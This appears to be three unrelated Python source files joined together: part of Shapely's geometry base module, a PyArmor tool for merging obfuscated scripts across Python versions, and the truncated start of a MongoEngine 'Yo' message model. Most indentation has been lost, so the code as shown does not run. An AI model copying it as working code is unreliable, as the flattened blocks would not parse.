geometry objects, but has no effect on geometric analysis. All
operations are performed in the x-y plane. Thus, geometries with
different z values may intersect or be equal.
"""
from binascii import a2b_hex
from ctypes import pointer, c_size_t, c_char_p, c_void_p
from itertools import islice
import math
import sys
from warnings import warn
from functools import wraps
from shapely.affinity import affine_transform
from shapely.coords import CoordinateSequence
from shapely.errors import WKBReadingError, WKTReadingError
from shapely.geos import WKBWriter, WKTWriter
from shapely.geos import lgeos
from shapely.impl import DefaultImplementation, delegated
if sys.version_info[0] < 3:
range = xrange
integer_types = (int, long)
else:
integer_types = (int,)
try:
import numpy as np
integer_types = integer_types + (np.integer,)
except ImportError:
pass
GEOMETRY_TYPES = [
'Point',
'LineString',
'LinearRing',
'Polygon',
'MultiPoint',
'MultiLineString',
'MultiPolygon',
'GeometryCollection',
]
def dump_coords(geom):
"""Dump coordinates of a geometry in the same order as data packing"""
if not isinstance(geom, BaseGeometry):
raise ValueError('Must be instance of a geometry class; found ' +
geom.__class__.__name__)
elif geom.type in ('Point', 'LineString', 'LinearRing'):
return geom.coords[:]
elif geom.type == 'Polygon':
return geom.exterior.coords[:] + [i.coords[:] for i in geom.interiors]
elif geom.type.startswith('Multi') or geom.type == 'GeometryCollection':
# Recursive call
return [dump_coords(part) for part in geom]
else:
raise ValueError('Unhandled geometry type: ' + repr(geom.type))
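# Hedged examples of the ordering described in the docstring above (assuming
# the usual shapely.geometry constructors):
#   dump_coords(Point(0, 0))                   -> [(0.0, 0.0)]
#   dump_coords(LineString([(0, 0), (1, 1)]))  -> [(0.0, 0.0), (1.0, 1.0)]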
def geometry_type_name(g):
if g is None:
raise ValueError("Null geometry has no type")
return GEOMETRY_TYPES[lgeos.GEOSGeomTypeId(g)]
def geom_factory(g, parent=None):
# Abstract geometry factory for use with topological methods below
if not g:
raise ValueError("No Shapely geometry can be created from null value")
ob = BaseGeometry()
geom_type = geometry_type_name(g)
# TODO: check cost of dynamic import by profiling
mod = __import__(
'shapely.geometry',
globals(),
locals(),
[geom_type],
)
ob.__class__ = getattr(mod, geom_type)
ob._geom = g
ob.__p__ = parent
if lgeos.methods['has_z'](g):
ob._ndim = 3
else:
ob._ndim = 2
ob._is_empty = False
return ob
def geom_from_wkt(data):
warn("`geom_from_wkt` is deprecated. Use `geos.wkt_reader.read(data)`.",
DeprecationWarning)
if sys.version_info[0] >= 3:
data = data.encode('ascii')
geom = lgeos.GEOSGeomFromWKT(c_char_p(data))
if not geom:
raise WKTReadingError(
"Could not create geometry because of errors while reading input.")
return geom_factory(geom)
def geom_to_wkt(ob):
warn("`geom_to_wkt` is deprecated. Use `geos.wkt_writer.write(ob)`.",
DeprecationWarning)
if ob is None or ob._geom is None:
raise ValueError("Null geometry supports no operations")
return lgeos.GEOSGeomToWKT(ob._geom)
def deserialize_wkb(data):
geom = lgeos.GEOSGeomFromWKB_buf(c_char_p(data), c_size_t(len(data)))
if not geom:
raise WKBReadingError(
"Could not create geometry because of errors while reading input.")
return geom
def geom_from_wkb(data):
warn("`geom_from_wkb` is deprecated. Use `geos.wkb_reader.read(data)`.",
DeprecationWarning)
return geom_factory(deserialize_wkb(data))
def geom_to_wkb(ob):
warn("`geom_to_wkb` is deprecated. Use `geos.wkb_writer.write(ob)`.",
DeprecationWarning)
if ob is None or ob._geom is None:
raise ValueError("Null geometry supports no operations")
size = c_size_t()
return lgeos.GEOSGeomToWKB_buf(c_void_p(ob._geom), pointer(size))
def geos_geom_from_py(ob, create_func=None):
"""Helper function for geos_*_from_py functions in each geom type.
    If a create_func is specified the coordinate sequence is cloned and a new
geometry is created with it, otherwise the geometry is cloned directly.
This behaviour is useful for converting between LineString and LinearRing
objects.
"""
if create_func is None:
geom = lgeos.GEOSGeom_clone(ob._geom)
else:
cs = lgeos.GEOSGeom_getCoordSeq(ob._geom)
cs = lgeos.GEOSCoordSeq_clone(cs)
geom = create_func(cs)
N = ob._ndim
return geom, N
def exceptNull(func):
"""Decorator which helps avoid GEOS operations on null pointers."""
@wraps(func)
def wrapper(*args, **kwargs):
if not args[0]._geom or args[0].is_empty:
raise ValueError("Null/empty geometry supports no operations")
return func(*args, **kwargs)
return wrapper
class CAP_STYLE(object):
round = 1
flat = 2
square = 3
class JOIN_STYLE(object):
round = 1
mitre = 2
bevel = 3
EMPTY = deserialize_wkb(a2b_hex(b'010700000000000000'))
class BaseGeometry(object):
"""
Provides GEOS spatial predicates and topological operations.
"""
# Attributes
# ----------
# __geom__ : c_void_p
# Cached ctypes pointer to GEOS geometry. Not to be accessed.
# _geom : c_void_p
# Property by which the GEOS geometry is accessed.
# __p__ : object
# Parent (Shapely) geometry
# _ctypes_data : object
# Cached ctypes data buffer
# _ndim : int
# Number of dimensions (2 or 3, generally)
# _crs : object
# Coordinate reference system. Available for Shapely extensions, but
# not implemented here.
# _other_owned : bool
# True if this object's GEOS geometry is owned by another as in the
# case of a multipart geometry member.
__geom__ = EMPTY
__p__ = None
_ctypes_data = None
_ndim = None
_crs = None
_other_owned = False
_is_empty = True
# Backend config
impl = DefaultImplementation
# a reference to the so/dll proxy to preserve access during clean up
_lgeos = lgeos
def empty(self, val=EMPTY):
# TODO: defer cleanup to the implementation. We shouldn't be
# explicitly calling a lgeos method here.
if not self._is_empty and not self._other_owned and self.__geom__:
try:
self._lgeos.GEOSGeom_destroy(self.__geom__)
except (AttributeError, TypeError):
pass # _lgeos might be empty on shutdown
self._is_empty = True
self.__geom__ = val
def __del__(self):
self.empty(val=None)
self.__p__ = None
def __str__(self):
return self.wkt
# To support pickling
def __reduce__(self):
return (self.__class__, (), self.wkb)
def __setstate__(self, state):
self.empty()
self.__geom__ = deserialize_wkb(state)
self._is_empty = False
if lgeos.methods['has_z'](self.__geom__):
self._ndim = 3
else:
self._ndim = 2
@property
def _geom(self):
return self.__geom__
@_geom.setter
def _geom(self, val):
self.empty()
self._is_empty = val in [EMPTY, None]
self.__geom__ = val
# Operators
# ---------
def __and__(self, other):
return self.intersection(other)
def __or__(self, other):
return self.union(other)
def __sub__(self, other):
return self.difference(other)
def __xor__(self, other):
return self.symmetric_difference(other)
def __eq__(self, other):
return (
type(other) == type(self) and
tuple(self.coords) == tuple(other.coords)
)
def __ne__(self, other):
return not self.__eq__(other)
__hash__ = None
# Array and ctypes interfaces
# ---------------------------
@property
def ctypes(self):
"""Return ctypes buffer"""
raise NotImplementedError
@property
def array_interface_base(self):
if sys.byteorder == 'little':
typestr = '<f8'
elif sys.byteorder == 'big':
typestr = '>f8'
else:
raise ValueError(
"Unsupported byteorder: neither little nor big-endian")
return {
'version': 3,
'typestr': typestr,
'data': self.ctypes,
}
@property
def __array_interface__(self):
"""Provide the Numpy array protocol."""
raise NotImplementedError
# Coordinate access
# -----------------
def _get_coords(self):
"""Access to geometry's coordinates (CoordinateSequence)"""
if self.is_empty:
return []
return CoordinateSequence(self)
def _set_coords(self, ob):
raise NotImplementedError(
"set_coords must be provided by derived classes")
coords = property(_get_coords, _set_coords)
@property
def xy(self):
"""Separate arrays of X and Y coordinate values"""
raise NotImplementedError
# Python feature protocol
@property
def __geo_interface__(self):
"""Dictionary representation of the geometry"""
raise NotImplementedError
# Type of geometry and its representations
# ----------------------------------------
def geometryType(self):
return geometry_type_name(self._geom)
@property
def type(self):
return self.geometryType()
def to_wkb(self):
warn("`to_wkb` is deprecated. Use the `wkb` property.",
DeprecationWarning)
return geom_to_wkb(self)
def to_wkt(self):
warn("`to_wkt` is deprecated. Use the `wkt` property.",
DeprecationWarning)
return geom_to_wkt(self)
@property
def wkt(self):
"""WKT representation of the geometry"""
return WKTWriter(lgeos).write(self)
@property
def wkb(self):
"""WKB representation of the geometry"""
return WKBWriter(lgeos).write(self)
@property
def wkb_hex(self):
"""WKB hex representation of the geometry"""
return WKBWriter(lgeos).write_hex(self)
def svg(self, scale_factor=1., **kwargs):
"""Raises NotImplementedError"""
raise NotImplementedError
def _repr_svg_(self):
"""SVG representation for iPython notebook"""
svg_top = '<svg xmlns="http://www.w3.org/2000/svg" ' \
'xmlns:xlink="http://www.w3.org/1999/xlink" '
if self.is_empty:
return svg_top + '/>'
else:
# Establish SVG canvas that will fit all the data + small space
xmin, ymin, xmax, ymax = self.bounds
if xmin == xmax and ymin == ymax:
# This is a point; buffer using an arbitrary size
xmin, ymin, xmax, ymax = self.buffer(1).bounds
else:
# Expand bounds by a fraction of the data ranges
expand = 0.04 # or 4%, same as R plots
widest_part = max([xmax - xmin, ymax - ymin])
expand_amount = widest_part * expand
xmin -= expand_amount
ymin -= expand_amount
xmax += expand_amount
ymax += expand_amount
dx = xmax - xmin
dy = ymax - ymin
width = min([max([100., dx]), 300])
height = min([max([100., dy]), 300])
try:
scale_factor = max([dx, dy]) / max([width, height])
except ZeroDivisionError:
scale_factor = 1.
view_box = "{} {} {} {}".format(xmin, ymin, dx, dy)
transform = "matrix(1,0,0,-1,0,{})".format(ymax + ymin)
return svg_top + (
'width="{1}" height="{2}" viewBox="{0}" '
'preserveAspectRatio="xMinYMin meet">'
'<g transform="{3}">{4}</g></svg>'
).format(view_box, width, height, transform,
self.svg(scale_factor))
@property
def geom_type(self):
"""Name of the geometry's type, such as 'Point'"""
return self.geometryType()
# Real-valued properties and methods
# ----------------------------------
@property
def area(self):
"""Unitless area of the geometry (float)"""
return self.impl['area'](self)
def distance(self, other):
"""Unitless distance to other geometry (float)"""
return self.impl['distance'](self, other)
def hausdorff_distance(self, other):
"""Unitless hausdorff distance to other geometry (float)"""
return self.impl['hausdorff_distance'](self, other)
@property
def length(self):
"""Unitless length of the geometry (float)"""
return self.impl['length'](self)
# Topological properties
# ----------------------
@property
def boundary(self):
"""Returns a lower dimension geometry that bounds the object
The boundary of a polygon is a line, the boundary of a line is a
collection of points. The boundary of a point is an empty (null)
collection.
"""
return geom_factory(self.impl['boundary'](self))
@property
def bounds(self):
"""Returns minimum bounding region (minx, miny, maxx, maxy)"""
if self.is_empty:
return ()
else:
return self.impl['bounds'](self)
@property
def centroid(self):
"""Returns the geometric center of the object"""
return geom_factory(self.impl['centroid'](self))
@delegated
def representative_point(self):
"""Returns a point guaranteed to be within the object, cheaply."""
return geom_factory(self.impl['representative_point'](self))
@property
def convex_hull(self):
"""Imagine an elastic band stretched around the geometry: that's a
convex hull, more or less
The convex hull of a three member multipoint, for example, is a
triangular polygon.
"""
return geom_factory(self.impl['convex_hull'](self))
@property
def envelope(self):
"""A figure that envelopes the geometry"""
return geom_factory(self.impl['envelope'](self))
@property
def minimum_rotated_rectangle(self):
"""Returns the general minimum bounding rectangle of
the geometry. Can possibly be rotated. If the convex hull
of the object is a degenerate (line or point) this same degenerate
is returned.
"""
# first compute the convex hull
hull = self.convex_hull
try:
coords = hull.exterior.coords
except AttributeError: # may be a Point or a LineString
return hull
# generate the edge vectors between the convex hull's coords
edges = ((pt2[0] - pt1[0], pt2[1] - pt1[1]) for pt1, pt2 in zip(
coords, islice(coords, 1, None)))
def _transformed_rects():
for dx, dy in edges:
# compute the normalized direction vector of the edge
# vector.
length = math.sqrt(dx ** 2 + dy ** 2)
ux, uy = dx / length, dy / length
# compute the normalized perpendicular vector
vx, vy = -uy, ux
# transform hull from the original coordinate system to
# the coordinate system defined by the edge and compute
# the axes-parallel bounding rectangle.
transf_rect = affine_transform(
hull, (ux, uy, vx, vy, 0, 0)).envelope
# yield the transformed rectangle and a matrix to
# transform it back to the original coordinate system.
yield (transf_rect, (ux, vx, uy, vy, 0, 0))
# check for the minimum area rectangle and return it
transf_rect, inv_matrix = min(
_transformed_rects(), key=lambda r: r[0].area)
return affine_transform(transf_rect, inv_matrix)
def buffer(self, distance, resolution=16, quadsegs=None,
cap_style=CAP_STYLE.round, join_style=JOIN_STYLE.round,
mitre_limit=5.0):
"""Returns a geometry with an envelope at a distance from the object's
envelope
A negative distance has a "shrink" effect. A zero distance may be used
to "tidy" a polygon. The resolution of the buffer around each vertex of
the object increases by increasing the resolution keyword parameter
or second positional parameter. Note: the use of a `quadsegs` parameter
is deprecated and will be gone from the next major release.
The styles of caps are: CAP_STYLE.round (1), CAP_STYLE.flat (2), and
CAP_STYLE.square (3).
The styles of joins between offset segments are: JOIN_STYLE.round (1),
JOIN_STYLE.mitre (2), and JOIN_STYLE.bevel (3).
The mitre limit ratio is used for very sharp corners. The mitre ratio
is the ratio of the distance from the corner to the end of the mitred
offset corner. When two line segments meet at a sharp angle, a miter
join will extend the original geometry. To prevent unreasonable
geometry, the mitre limit allows controlling the maximum length of the
join corner. Corners with a ratio which exceed the limit will be
beveled.
Example:
>>> from shapely.wkt import loads
>>> g = loads('POINT (0.0 0.0)')
>>> g.buffer(1.0).area # 16-gon approx of a unit radius circle
3.1365484905459389
>>> g.buffer(1.0, 128).area # 128-gon approximation
3.1415138011443009
>>> g.buffer(1.0, 3).area # triangle approximation
3.0
>>> list(g.buffer(1.0, cap_style=CAP_STYLE.square).exterior.coords)
[(1.0, 1.0), (1.0, -1.0), (-1.0, -1.0), (-1.0, 1.0), (1.0, 1.0)]
>>> g.buffer(1.0, cap_style=CAP_STYLE.square).area
4.0
"""
if quadsegs is not None:
warn(
"The `quadsegs` argument is deprecated. Use `resolution`.",
DeprecationWarning)
res = quadsegs
else:
res = resolution
if mitre_limit == 0.0:
raise ValueError(
'Cannot compute offset from zero-length line segment')
if cap_style == CAP_STYLE.round and join_style == JOIN_STYLE.round:
return geom_factory(self.impl['buffer'](self, distance, res))
if 'buffer_with_style' not in self.impl:
raise NotImplementedError("Styled buffering not available for "
"GEOS versions < 3.2.")
return geom_factory(self.impl['buffer_with_style'](self, distance, res,
cap_style,
join_style,
mitre_limit))
@delegated
def simplify(self, tolerance, preserve_topology=True):
"""Returns a simplified geometry produced by the Douglas-Peucker
algorithm
Coordinates of the simplified geometry will be no more than the
tolerance distance from the original. Unless the topology preserving
option is used, the algorithm may produce self-intersecting or
otherwise invalid geometries.
"""
if preserve_topology:
op = self.impl['topology_preserve_simplify']
else:
op = self.impl['simplify']
return geom_factory(op(self, tolerance))
# Binary operations
# -----------------
def difference(self, other):
"""Returns the difference of the geometries"""
return geom_factory(self.impl['difference'](self, other))
def intersection(self, other):
"""Returns the intersection of the geometries"""
return geom_factory(self.impl['intersection'](self, other))
def symmetric_difference(self, other):
"""Returns the symmetric difference of the geometries
(Shapely geometry)"""
return geom_factory(self.impl['symmetric_difference'](self, other))
def union(self, other):
"""Returns the union of the geometries (Shapely geometry)"""
return geom_factory(self.impl['union'](self, other))
# Unary predicates
# ----------------
@property
def has_z(self):
"""True if the geometry's coordinate sequence(s) have z values (are
3-dimensional)"""
return bool(self.impl['has_z'](self))
@property
def is_empty(self):
"""True if the set of points in this geometry is empty, else False"""
return (self._geom is None) or bool(self.impl['is_empty'](self))
@property
def is_ring(self):
"""True if the geometry is a closed ring, else False"""
return bool(self.impl['is_ring'](self))
@property
def is_closed(self):
"""True if the geometry is closed, else False
Applicable only to 1-D geometries."""
if self.geom_type == 'LinearRing':
return True
elif self.geom_type == 'LineString':
if 'is_closed' in self.impl:
return bool(self.impl['is_closed'](self))
else:
return self.coords[0] == self.coords[-1]
else:
return False
@property
def is_simple(self):
"""True if the geometry is simple, meaning that any self-intersections
are only at boundary points, else False"""
return bool(self.impl['is_simple'](self))
@property
def is_valid(self):
"""True if the geometry is valid (definition depends on sub-class),
else False"""
return bool(self.impl['is_valid'](self))
# Binary predicates
# -----------------
def relate(self, other):
"""Returns the DE-9IM intersection matrix for the two geometries
(string)"""
return self.impl['relate'](self, other)
def covers(self, other):
"""Returns True if the geometry covers the other, else False"""
return bool(self.impl['covers'](self, other))
def contains(self, other):
"""Returns True if the geometry contains the other, else False"""
return bool(self.impl['contains'](self, other))
def crosses(self, other):
"""Returns True if the geometries cross, else False"""
return bool(self.impl['crosses'](self, other))
def disjoint(self, other):
"""Returns True if geometries are disjoint, else False"""
return bool(self.impl['disjoint'](self, other))
def equals(self, other):
"""Returns True if geometries are equal, else False
Refers to point-set equality (or topological equality), and is equivalent to
(self.within(other) & self.contains(other))
"""
return bool(self.impl['equals'](self, other))
def intersects(self, other):
"""Returns True if geometries intersect, else False"""
return bool(self.impl['intersects'](self, other))
def overlaps(self, other):
"""Returns True if geometries overlap, else False"""
return bool(self.impl['overlaps'](self, other))
def touches(self, other):
"""Returns True if geometries touch, else False"""
return bool(self.impl['touches'](self, other))
def within(self, other):
"""Returns True if geometry is within the other, else False"""
return bool(self.impl['within'](self, other))
def equals_exact(self, other, tolerance):
"""Returns True if geometries are equal to within a specified
tolerance
Refers to coordinate equality, which requires coordinates to be equal
and in the same order for all components of a geometry
"""
return bool(self.impl['equals_exact'](self, other, tolerance))
def almost_equals(self, other, decimal=6):
"""Returns True if geometries are equal at all coordinates to a
specified decimal place
Refers to approximate coordinate equality, which requires coordinates be
approximately equal and in the same order for all components of a geometry.
"""
return self.equals_exact(other, 0.5 * 10**(-decimal))
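    # Worked example for `almost_equals` above: the default decimal=6 calls
    # equals_exact(other, 0.5 * 10 ** -6), i.e. a tolerance of 5e-07.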
def relate_pattern(self, other, pattern):
"""Returns True if the DE-9IM string code for the relationship between
the geometries satisfies the pattern, else False"""
pattern = c_char_p(pattern.encode('ascii'))
return bool(self.impl['relate_pattern'](self, other, pattern))
# Linear referencing
# ------------------
@delegated
def project(self, other, normalized=False):
"""Returns the distance along this geometry to a point nearest the
specified point
If the normalized arg is True, return the distance normalized to the
length of the linear geometry.
"""
if normalized:
op = self.impl['project_normalized']
else:
op = self.impl['project']
return op(self, other)
@delegated
@exceptNull
def interpolate(self, distance, normalized=False):
"""Return a point at the specified distance along a linear geometry
Negative length values are taken as measured in the reverse
direction from the end of the geometry. Out-of-range index
values are handled by clamping them to the valid range of values.
If the normalized arg is True, the distance will be interpreted as a
fraction of the geometry's length.
"""
if normalized:
op = self.impl['interpolate_normalized']
else:
op = self.impl['interpolate']
return geom_factory(op(self, distance))
class BaseMultipartGeometry(BaseGeometry):
def shape_factory(self, *args):
# Factory for part instances, usually a geometry class
raise NotImplementedError("To be implemented by derived classes")
@property
def ctypes(self):
raise NotImplementedError(
"Multi-part geometries have no ctypes representations")
@property
def __array_interface__(self):
"""Provide the Numpy array protocol."""
raise NotImplementedError("Multi-part geometries do not themselves "
"provide the array interface")
def _get_coords(self):
raise NotImplementedError("Sub-geometries may have coordinate "
"sequences, but collections do not")
def _set_coords(self, ob):
raise NotImplementedError("Sub-geometries may have coordinate "
"sequences, but collections do not")
@property
def coords(self):
raise NotImplementedError(
"Multi-part geometries do not provide a coordinate sequence")
@property
def geoms(self):
if self.is_empty:
return []
return GeometrySequence(self, self.shape_factory)
def __iter__(self):
if not self.is_empty:
return iter(self.geoms)
else:
return iter([])
def __len__(self):
if not self.is_empty:
return len(self.geoms)
else:
return 0
def __getitem__(self, index):
if not self.is_empty:
return self.geoms[index]
else:
return ()[index]
def __eq__(self, other):
return (
type(other) == type(self) and
len(self) == len(other) and
all(x == y for x, y in zip(self, other))
)
def __ne__(self, other):
return not self.__eq__(other)
__hash__ = None
def svg(self, scale_factor=1., color=None):
"""Returns a group of SVG elements for the multipart geometry.
Parameters
==========
scale_factor : float
Multiplication factor for the SVG stroke-width. Default is 1.
color : str, optional
Hex string for stroke or fill color. Default is to use "#66cc99"
if geometry is valid, and "#ff3333" if invalid.
"""
if self.is_empty:
return '<g />'
if color is None:
color = "#66cc99" if self.is_valid else "#ff3333"
return '<g>' + \
''.join(p.svg(scale_factor, color) for p in self) + \
'</g>'
class GeometrySequence(object):
"""
Iterative access to members of a homogeneous multipart geometry.
"""
# Attributes
# ----------
# _factory : callable
# Returns instances of Shapely geometries
# _geom : c_void_p
# Ctypes pointer to the parent's GEOS geometry
# _ndim : int
# Number of dimensions (2 or 3, generally)
# __p__ : object
# Parent (Shapely) geometry
shape_factory = None
_geom = None
__p__ = None
_ndim = None
def __init__(self, parent, type):
self.shape_factory = type
self.__p__ = parent
def _update(self):
self._geom = self.__p__._geom
self._ndim = self.__p__._ndim
def _get_geom_item(self, i):
g = self.shape_factory()
g._other_owned = True
g._geom = lgeos.GEOSGetGeometryN(self._geom, i)
g._ndim = self._ndim
g.__p__ = self
return g
def __iter__(self):
self._update()
for i in range(self.__len__()):
yield self._get_geom_item(i)
def __len__(self):
self._update()
return lgeos.GEOSGetNumGeometries(self._geom)
def __getitem__(self, key):
self._update()
m = self.__len__()
if isinstance(key, integer_types):
if key + m < 0 or key >= m:
raise IndexError("index out of range")
if key < 0:
i = m + key
else:
i = key
return self._get_geom_item(i)
elif isinstance(key, slice):
if type(self) == HeterogeneousGeometrySequence:
raise TypeError(
"Heterogenous geometry collections are not sliceable")
res = []
start, stop, stride = key.indices(m)
for i in range(start, stop, stride):
res.append(self._get_geom_item(i))
return type(self.__p__)(res or None)
else:
raise TypeError("key must be an index or slice")
@property
def _longest(self):
        longest = 0
        for g in iter(self):
            length = len(g.coords)
            if length > longest:
                longest = length
        return longest
class HeterogeneousGeometrySequence(GeometrySequence):
"""
Iterative access to a heterogeneous sequence of geometries.
"""
def __init__(self, parent):
super(HeterogeneousGeometrySequence, self).__init__(parent, None)
def _get_geom_item(self, i):
sub = lgeos.GEOSGetGeometryN(self._geom, i)
g = geom_factory(sub, parent=self)
g._other_owned = True
return g
class EmptyGeometry(BaseGeometry):
def __init__(self):
"""Create an empty geometry."""
BaseGeometry.__init__(self)
def _test():
"""Test runner"""
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
|
the-stack_106_13031
|
'''This tool is used to merge the scripts obfuscated by different
Python versions into one obfuscated script.
For example,
1. First obfuscate the scripts by Python 2.7
python2.7 pyarmor.py obfuscate -O py27 foo.py
2. Then obfuscate the scripts by Python 3.8
python3.8 pyarmor.py obfuscate -O py38 foo.py
3. Run this tool to merge all of them to path `merged_dist`
python merge.py py38/ py27/
It is also possible to merge one script, for example:
python merge.py py27/foo.py py36/foo.py py35/foo.py
'''
import argparse
import logging
import os
import shutil
import struct
import sys
logger = logging.getLogger('merge')
def is_pyscript(filename):
return os.path.splitext(filename)[-1].lower() in ('.py', '.pyw')
def makedirs(path, exist_ok=False):
if not (exist_ok and os.path.exists(path)):
if path:
os.makedirs(path)
def parse_script(filename):
n = 0
with open(filename) as f:
for s in f.readlines():
if s.startswith('__pyarmor') or s.startswith('pyarmor('):
fs = s[s.find('__file__'):s.rfind(')')].split(', ')
code = eval(fs[-2])
flag = int(fs[-1])
break
n += 1
else:
return None, None, None, None
left_size = len(code)
offset = 0
infos = []
valid = False
while left_size > 0:
pymajor, pyminor = struct.unpack("BB", code[offset+9:offset+11])
size, = struct.unpack("i", code[offset+56:offset+60])
if not size:
valid = True
size = left_size
left_size -= size
infos.append([offset, size, (pymajor, pyminor)])
offset += size
if not valid:
raise RuntimeError('Invalid header in this script')
return n, flag, code, infos
def merge_scripts(scripts, output):
refscript = scripts.pop(0)
logger.info('Parse reference script %s', refscript)
refn, reflag, refcode, refinfos = parse_script(refscript)
if refcode is None:
logger.info('Ignore this script, it is not obfuscated')
return
merged_vers = []
pieces = []
for script in reversed(scripts):
logger.info('Parse script %s', script)
n, flag, code, pyinfos = parse_script(script)
if code is None:
raise RuntimeError('This script is not an obfuscated script')
if reflag != flag:
raise RuntimeError('The script "%s" is obfuscated with '
'different way' % script)
if len(pyinfos) > 1:
raise RuntimeError('The script "%s" is merged script' % script)
ver = pyinfos[0][-1]
logger.debug('\tFound Python %d.%d', *ver)
if ver in merged_vers:
            logger.warning('\tIgnore this Python %d.%d', *ver)
continue
logger.debug('\tMerge this Python %d.%d', *ver)
merged_vers.append(ver)
pieces.extend([code[:56], struct.pack("i", len(code)), code[60:]])
logger.debug('Handle reference script %s', refscript)
for offset, size, ver in refinfos:
logger.debug('\tFound Python %d.%d', *ver)
if ver in merged_vers:
logger.debug('\tIgnore this Python %d.%d', *ver)
continue
logger.debug('\tMerge this Python %d.%d', *ver)
merged_vers.append(ver)
pieces.append(refcode[offset:offset+size])
scode = '\\x' + '\\x'.join(['%02x' % c
for c in bytearray(b''.join(pieces))])
with open(scripts[0]) as f:
lines = f.readlines()
s = lines[refn]
i = s.find(', b')
j = s.rfind(',')
lines[refn] = s[:i+4] + scode + s[j-1:]
logger.info('Write merged script: %s', output)
for ver in merged_vers:
logger.info('\t* Python %d.%d', *ver)
makedirs(os.path.dirname(output), exist_ok=True)
with open(output, 'w') as f:
f.write(''.join(lines))
def merge_runtimes(paths, output):
runtimes = []
pyvers = []
refpath = os.path.normpath(paths[-1])
n = len(refpath) + 1
for root, dirs, files in os.walk(refpath):
if os.path.basename(root).startswith('pytransform'):
runtimes.append(root[n:])
for x in files:
if x.startswith('pytransform'):
runtimes.append(os.path.join(root, x)[n:])
elif is_pyscript(x) and not pyvers:
name = os.path.join(root, x)[n:]
for p in paths:
pyinfos = parse_script(os.path.join(p, name))[-1]
if pyinfos is None:
pyvers = []
break
if len(pyinfos) > 1:
raise RuntimeError('The runtime file in %s is merged'
% p)
pyvers.append(pyinfos[0][-1])
logger.debug('Found runtimes: %s', runtimes)
if not runtimes:
raise RuntimeError('No runtime files found')
elif len(runtimes) > 1:
raise RuntimeError('Too many runtime files')
logger.debug('Found python versions: %s', pyvers)
if not pyvers:
raise RuntimeError('Could not get python version of runtime files')
r = os.path.join(refpath, runtimes[0])
if os.path.isdir(r):
logger.info('Copy non-super mode runtime package %s', r)
dst = os.path.join(output, runtimes[0])
logger.info('To %s', dst)
makedirs(os.path.dirname(dst), exist_ok=True)
shutil.copytree(r, dst)
return
pkgname = os.path.basename(r).rsplit('.', 1)[0]
pkgpath = os.path.join(output, pkgname)
makedirs(pkgpath, exist_ok=True)
src = os.path.join(pkgpath, '__init__.py')
logger.info('Create super runtime package: %s', src)
with open(src, 'w') as f:
f.write(
"import sys\n"
"sys.modules[__name__].__dict__.update("
"__import__('.'.join("
"[__name__, 'py%s%s' % sys.version_info[:2], __name__]),"
" globals(), locals(), ['*']).__dict__)"
)
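    # Hedged illustration: for a runtime package named `pytransform` running
    # under Python 3.8, the generated __init__.py above behaves roughly like
    # `from .py38.pytransform import *` at import time.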
for p, (major, minor) in zip(paths, pyvers):
src = os.path.join(p, runtimes[0])
dst = os.path.join(pkgpath, 'py%s%s' % (major, minor))
logger.info('Copy %s to %s', src, dst)
makedirs(dst, exist_ok=True)
shutil.copy2(src, dst)
logger.debug('Create package file "%s/__init__.py"', dst)
with open(os.path.join(dst, '__init__.py'), 'w') as f:
f.write('')
def find_scripts(paths):
names = []
refpath = os.path.normpath(paths[-1])
logger.info('Find scripts in the path %s', refpath)
n = len(refpath) + 1
for root, dirs, files in os.walk(refpath):
for x in files:
if not is_pyscript(x):
continue
scripts = [os.path.join(root, x)]
names.append(scripts[0][n:])
return names
def excepthook(type, exc, traceback):
try:
msg = exc.args[0] % exc.args[1:]
except Exception:
msg = str(exc)
logging.error(msg)
sys.exit(1)
def main():
parser = argparse.ArgumentParser(
prog='pyarmor merge',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=__doc__)
parser.add_argument('-O', '--output',
default='merged_dist',
                        help='Default output path: %(default)s')
parser.add_argument('-d', '--debug',
default=False,
action='store_true',
dest='debug',
help='print debug log (default: %(default)s)')
parser.add_argument('path', nargs='+',
help="Path or obfuscated script")
args = parser.parse_args(sys.argv[1:])
if args.debug:
logger.setLevel(logging.DEBUG)
else:
sys.excepthook = excepthook
logger.info('Merge %s...', str(args.path)[1:-1])
output = args.output
if os.path.isfile(args.path[0]):
output = output if is_pyscript(output) \
else os.path.join(output, os.path.basename(args.path[0]))
merge_scripts(args.path, output)
else:
if output and is_pyscript(output):
            raise RuntimeError('--output must be a path when merging paths')
logging.info('Merging obfuscated scripts...')
for name in find_scripts(args.path):
merge_scripts([os.path.join(p, name) for p in args.path],
os.path.join(output, name))
logging.info('Merging obfuscated scripts OK')
logging.info('Merging runtime files...')
merge_runtimes(args.path, output)
logging.info('Merging runtime files OK')
logger.info('Merge all the scripts to %s successfully', output)
if __name__ == '__main__':
logging.basicConfig(
level=logging.INFO,
format='%(levelname)-8s %(message)s',
)
main()
|
the-stack_106_13032
|
# -*- coding: utf-8 -*-
"""Yo model"""
from bson import DBRef
from datetime import datetime
from flask_mongoengine import Document
from mongoengine import (BooleanField, StringField, LongField, ListField,
GeoPointField, PULL, DictField)
from .header import Header
from .helpers import URLField, DocumentMixin, ReferenceField
from .user import User
from .yo_token import YoToken
from ..constants.yos import STATUS_PRIORITY_MAP
from yoapi.models import oauth
from yoapi.models.region import Region
class Yo(DocumentMixin, Document):
"""MongoDB Yo model."""
meta = {'collection': 'yo',
'indexes': ['recipient',
{'fields': ['photo'], 'sparse': True},
{'fields': ['is_favorite'], 'sparse': True},
{'fields': ['scheduled_for'], 'sparse': True},
{'fields': ['reply_to'], 'sparse': True},
('scheduled_for', 'status'),
('sender', 'created'),
('recipient', 'created'),
('sender', 'recipient', 'created'),
('recipient', 'sender', 'created')],
'auto_create_index': False}
not_on_yo = None
# The user sending the Yo.
sender = ReferenceField(User)
# DEPRECATED: The users receiving the yos
recipients = ListField(ReferenceField(User), default=None)
# DEPRECATED: The child yos associated with this
# This should only have been used with welcome links
children = ListField(ReferenceField('self', reverse_delete_rule=PULL),
default=None)
# The user receiving the yo
recipient = ReferenceField(User, default=None)
# If this Yo is a reply, this is the original Yo
reply_to = ReferenceField('self', reverse_delete_rule=PULL, default=None)
# The OAuth client used to sent this Yo, can be None if sent from our clients.
oauth_client = ReferenceField(oauth.Client, default=None)
# Recipient count.
recipient_count = LongField()
# Boolean indicator for group type.
is_group_yo = BooleanField()
# Boolean indicator if the yo was favorited.
is_favorite = BooleanField()
is_poll = BooleanField()
is_push_only = BooleanField()
duration_in_minutes = LongField()
# Boolean indicator for broadcast type.
broadcast = BooleanField()
# Optional location from which Yo was sent.
location = GeoPointField()
# The city of which the location refers to.
